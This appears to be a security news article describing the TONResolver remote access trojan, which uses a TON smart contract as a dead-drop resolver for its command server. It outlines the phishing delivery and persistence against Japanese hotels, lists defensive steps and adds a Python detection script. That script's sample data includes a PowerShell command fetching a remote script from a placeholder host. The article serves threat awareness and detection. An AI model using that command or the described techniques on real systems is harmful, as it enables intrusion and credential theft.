TONResolver Malware Abuses TON Smart Contracts for C2 Switching
Key Takeaways
- A new Remote Access Trojan (RAT), dubbed TONResolver, is actively targeting Japan’s hospitality sector.
- The malware leverages The Open Network (TON) blockchain’s smart contracts as a “dead drop resolver” for its command-and-control (C2) server.
- This novel C2 mechanism allows attackers to dynamically change their server addresses, making the malware highly resilient to detection and takedown efforts.
- Initial infections occur via sophisticated phishing campaigns, often employing a “conversational attack” approach to build trust.
- Upon successful compromise, TONResolver collects system information and attempts to steal credentials, cookies, and browsing data from Chrome and Edge.
A sophisticated new cyberattack campaign has emerged, primarily targeting Japan’s hospitality industry. Researchers have identified a novel Remote Access Trojan (RAT), named TONResolver, which distinguishes itself by utilizing The Open Network (TON) blockchain’s smart contracts to manage its command-and-control (C2) infrastructure.
Beginning in late May 2026, threat actors initiated a series of phishing attacks. These campaigns targeted Japanese companies partnered with Booking.com, employing deceptive emails that mimicked urgent guest complaints or review requests. The primary objective was to entice hotel employees into opening malicious attachments, which would then grant the attackers unauthorized remote access to their systems.
The innovative aspect of this malware lies in its C2 communication strategy. Instead of embedding a static C2 server address, TONResolver uses the TON blockchain as a “dead drop resolver.” This technique enables the attackers to update the C2 server address dynamically without modifying the malware itself, significantly enhancing its resilience against detection and disruption efforts.
Trend Micro said in a report that their analysts identified TONResolver and confirmed its functionality as a RAT. According to their findings, infected systems maintain a persistent connection to the C2 server, remaining ready to receive commands as long as the infection persists. Telemetry data indicates that Japan is currently the most affected region by these attacks.
Phishing Tactics and Initial Compromise
The attackers employed two distinct delivery methods to spread TONResolver. The first involved widespread phishing emails with subject lines designed to create a sense of urgency, such as “Important: Guest Stay Review Request.”
The second, more insidious approach, was a “conversational attack” conducted through Gmail. In this method, the attacker would send an initial, seemingly innocuous inquiry, establish rapport with the recipient, and then follow up with a malicious link. This trust-building tactic is often associated with advanced persistent threat (APT) groups.

A successful infection by TONResolver can lead to significant data compromise. Once executed, the malware gathers critical system information, including the victim’s username, hostname, operating system details, CPU count, memory specifications, and MAC address. Further analysis through managed detection and response (MDR) revealed that the malware actively attempts to steal credentials, cookies, browsing history, and autofill data stored in popular web browsers like Chrome and Edge.
TONResolver Malware Uses TON Smart Contracts
The most notable technical innovation of TONResolver is its method for locating its C2 server. Instead of a hardcoded IP address or domain, the attackers embed the C2 server’s domain within a TON smart contract. When the malware is executed, it queries the legitimate TON API endpoint, specifically tonapi[.]io, using a method called “get_domain” to retrieve the current active C2 server address.
This “dead drop resolver” mechanism provides a substantial advantage to the attackers. Should a C2 server be identified and blocked, the threat actors can simply update the domain stored within the TON smart contract. All previously infected machines will then automatically connect to the new server without requiring any alteration or redeployment of the malware itself. Analysis of transaction history on the TON blockchain has confirmed that the attackers have actively exploited this capability, making multiple C2 domain switches throughout the campaign.
The malware’s payload is a JavaScript file, executed via Node.js, a legitimate and widely trusted runtime environment. To impede static analysis, the malware employs VM-based obfuscation, transforming its logic into a custom virtual instruction set. All network communication is further secured using WebSocket with ECDH key exchange and AES-256-CBC encryption, rendering traditional packet-level inspection largely ineffective against this threat.

Infection Chain and Persistence Tactics
The infection process commences when a victim interacts with a malicious hyperlink within a phishing email, leading to the download of a ZIP archive from an attacker-controlled website. This archive contains a shortcut file (.LNK) cleverly disguised as an image file. Executing this LNK file triggers a PowerShell command, which then retrieves a PS1 script from the attacker’s server, initiating the full infection sequence.
The PS1 script is responsible for deploying the JavaScript payload and silently downloading Node.js version 24.13.0 from nodejs.org to serve as the execution environment. For persistence, the malware establishes a Windows registry Run key. It also incorporates a mutex check to prevent multiple instances from running concurrently. This combination of leveraging legitimate tools and obfuscation techniques allows TONResolver to bypass many conventional security measures.
What You Should Do
- Organizations should immediately restrict or monitor connectivity to the TON platform, specifically blocking tonapi[.]io, to sever the dead drop resolver link.
- Configure PowerShell to prevent the retrieval of external files and implement robust monitoring for Node.js processes running from unusual locations, particularly within AppData paths.
- Strengthen email security protocols, including advanced phishing detection and user awareness training, to mitigate the risk of initial compromise.
- Regularly review and update security configurations, enhance endpoint detection and response (EDR) capabilities, and refresh incident response procedures to effectively counter this evolving threat.
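The following is an added triage example, not code from the article or from Trend Micro. It turns the host indicators described above (PowerShell launched from Explorer fetching a remote script, Node.js running out of AppData, a Run key pointing at that Node.js, and the tonapi.io dead-drop lookup) into checks over Sysmon-style event records; the event field names and all sample values are assumptions constructed for the example.

```python
# Added example (constructed; not code from the article or Trend Micro):
# applies the TONResolver host indicators described above to Sysmon-style
# event dicts. Field names and sample values are assumptions.
import re

APPDATA = re.compile(r"\\AppData\\", re.I)
TONAPI = re.compile(r"(^|\.)tonapi\.io$", re.I)
RUNKEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)

def check_event(ev):
    """Return the indicator names matched by one event."""
    hits, kind, image = [], ev.get("type"), ev.get("image", "")
    if kind == "process":
        # Node.js launched from a per-user AppData path.
        if image.lower().endswith("node.exe") and APPDATA.search(image):
            hits.append("node_from_appdata")
        # LNK stage: Explorer spawning PowerShell that fetches a remote script.
        if (image.lower().endswith("powershell.exe")
                and ev.get("parent", "").lower().endswith("explorer.exe")
                and re.search(r"https?://", ev.get("cmdline", ""), re.I)):
            hits.append("powershell_remote_script")
    elif kind == "registry":
        # Run-key persistence whose command runs node.exe out of AppData.
        value = ev.get("value", "")
        if RUNKEY.search(ev.get("key", "")) and "node.exe" in value.lower() and APPDATA.search(value):
            hits.append("run_key_node_appdata")
    elif kind == "dns":
        # Dead-drop resolver lookup against tonapi.io (defanged in the article).
        if TONAPI.search(ev.get("query", "")):
            hits.append("tonapi_lookup")
    return hits

def triage(events):
    """Group the matching events by indicator name."""
    found = {}
    for ev in events:
        for hit in check_event(ev):
            found.setdefault(hit, []).append(ev)
    return found

# Constructed sample telemetry mirroring the infection chain in the article.
NODE = r"C:\Users\u\AppData\Roaming\node\node.exe"
SAMPLE = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell -c iwr http://example.invalid/s.ps1"},
    {"type": "registry", "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\upd",
     "value": NODE + r" C:\Users\u\AppData\Roaming\node\app.js"},
    {"type": "process", "image": NODE, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "dns", "image": NODE, "query": "tonapi.io"},
    {"type": "process", "image": r"C:\Program Files\nodejs\node.exe", "parent": r"C:\Windows\System32\cmd.exe"},
]
```

A system-wide Node.js install under Program Files is deliberately included so that only the AppData copy is flagged; a real deployment would feed `triage` from an EDR or Sysmon export rather than the inline sample.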
Indicators of Compromise (IoCs):
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.